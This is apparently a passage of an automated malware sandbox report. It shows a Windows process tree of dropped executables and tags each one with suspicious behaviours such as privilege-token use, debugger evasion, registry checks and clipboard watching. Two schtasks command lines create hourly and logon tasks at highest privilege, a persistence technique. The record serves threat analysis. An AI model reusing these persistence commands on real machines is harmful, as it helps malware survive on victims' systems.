C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:11488
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10920
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12752
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:3784
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:14608
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:15168
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:14592
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:15312
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:15024
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:15232
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:11980
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12856
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12376
-
-
-
C:\Users\Admin\Documents\P16ofDXrRIjcgmlh_CM6ho3M.exe"C:\Users\Admin\Documents\P16ofDXrRIjcgmlh_CM6ho3M.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2248 -
C:\Users\Admin\AppData\Roaming\2118516.exe"C:\Users\Admin\AppData\Roaming\2118516.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5728 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5728 -s 23484⤵
- Program crash
- Enumerates system info in registry
PID:8992
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5728 -s 23484⤵
- Program crash
PID:7524
-
-
-
C:\Users\Admin\AppData\Roaming\2546805.exe"C:\Users\Admin\AppData\Roaming\2546805.exe"3⤵PID:5252
-
-
C:\Users\Admin\AppData\Roaming\1378248.exe"C:\Users\Admin\AppData\Roaming\1378248.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 24724⤵
- Program crash
PID:8448
-
-
-
C:\Users\Admin\AppData\Roaming\4718977.exe"C:\Users\Admin\AppData\Roaming\4718977.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5244
-
-
C:\Users\Admin\AppData\Roaming\4047125.exe"C:\Users\Admin\AppData\Roaming\4047125.exe"3⤵
- Executes dropped EXE
PID:6136
-
-
-
C:\Users\Admin\Documents\oVqZpEClc7pin1vVFpe44nxh.exe"C:\Users\Admin\Documents\oVqZpEClc7pin1vVFpe44nxh.exe"2⤵
- Executes dropped EXE
PID:828 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 3003⤵
- Program crash
PID:1092
-
-
-
C:\Users\Admin\Documents\xsh_JRTNhnaSsr0N0iyGUKJl.exe"C:\Users\Admin\Documents\xsh_JRTNhnaSsr0N0iyGUKJl.exe"2⤵
- Executes dropped EXE
PID:4556 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1560
-
-
-
C:\Users\Admin\Documents\7ErLa0RFLI6vyU7MyTq31upS.exe"C:\Users\Admin\Documents\7ErLa0RFLI6vyU7MyTq31upS.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Users\Admin\Documents\6E9Hd52_WGEiBxNWxEs12YEN.exe"C:\Users\Admin\Documents\6E9Hd52_WGEiBxNWxEs12YEN.exe"2⤵
- Executes dropped EXE
PID:1080
-
-
C:\Users\Admin\Documents\Gn6IQGGC247F9azIFetpAORy.exe"C:\Users\Admin\Documents\Gn6IQGGC247F9azIFetpAORy.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:716 -
C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5548 -
C:\Users\Admin\Documents\D8yXM9eLWnP7bOeKA2sqxWzz.exe"C:\Users\Admin\Documents\D8yXM9eLWnP7bOeKA2sqxWzz.exe"4⤵PID:1620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 2805⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:6628
-
-
-
C:\Users\Admin\Documents\VANK2aMMhI2m937DyosAkDEb.exe"C:\Users\Admin\Documents\VANK2aMMhI2m937DyosAkDEb.exe"4⤵PID:1168
-
C:\Users\Admin\AppData\Roaming\1802667.exe"C:\Users\Admin\AppData\Roaming\1802667.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:7620 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7620 -s 23366⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6632
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7620 -s 23366⤵
- Program crash
PID:8176
-
-
-
C:\Users\Admin\AppData\Roaming\4908786.exe"C:\Users\Admin\AppData\Roaming\4908786.exe"5⤵
- Suspicious behavior: SetClipboardViewer
PID:7840
-
-
C:\Users\Admin\AppData\Roaming\2876392.exe"C:\Users\Admin\AppData\Roaming\2876392.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:7936
-
-
C:\Users\Admin\AppData\Roaming\6366479.exe"C:\Users\Admin\AppData\Roaming\6366479.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:7180
-
-
C:\Users\Admin\AppData\Roaming\4586601.exe"C:\Users\Admin\AppData\Roaming\4586601.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:7232 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7232 -s 24126⤵
- Program crash
PID:4520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7232 -s 24126⤵
- Program crash
PID:9380
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5712
-
-
-
C:\Users\Admin\Documents\cM775w5s6FbQBcukhv8b0GUT.exe"C:\Users\Admin\Documents\cM775w5s6FbQBcukhv8b0GUT.exe"2⤵
- Executes dropped EXE
PID:552
-
-
C:\Users\Admin\Documents\GGUYxB8IdnvmZwODT1wxOWma.exe"C:\Users\Admin\Documents\GGUYxB8IdnvmZwODT1wxOWma.exe"2⤵
- Executes dropped EXE
PID:472 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 472 -s 2403⤵
- Program crash
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:424
-
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe"C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2468 -
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:492
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Executes dropped EXE
PID:5436
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Executes dropped EXE
PID:2300
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Executes dropped EXE
PID:5260
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Executes dropped EXE
PID:5820
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:5228
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:580
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6460
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6972
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:1716
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3024
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3116
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4168
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7268
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7920
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4164
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4572
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7852
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:5472
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:2512
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8468
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:8952
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6592
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8940
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:9688
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8824
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:9600
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8208
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:2556
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3348
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6076
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:2208
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:496
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:5056
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6044
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7904
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:9276
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5976
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7012
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4268
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10740
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6168
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3676
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10636
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10368
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7992
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4788
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10376
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:2096
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3172
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3680
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Enumerates system info in registry
PID:4520
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10652
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:2304
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:9988
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10208
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10092
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8064
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4620
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8584
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10592
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:9588
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7504
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6204
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6080
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:11028
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8104 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9132
-
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3860
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10076
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8132
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6052
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10980
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:1036
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:5732
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3912
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7664
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:2744
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6672
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:1288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 284⤵
- Program crash
- Enumerates system info in registry
PID:5272
-
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7312
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:5568
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8200
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4188
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:9468
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3396
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:9888
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:11016
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:11200
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4344
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4380
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:5360
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:9432
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3384
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5388
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4372
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:5040
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:1292
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10392
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7484
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8948
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7884
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3556
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3028
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:12648
-
-
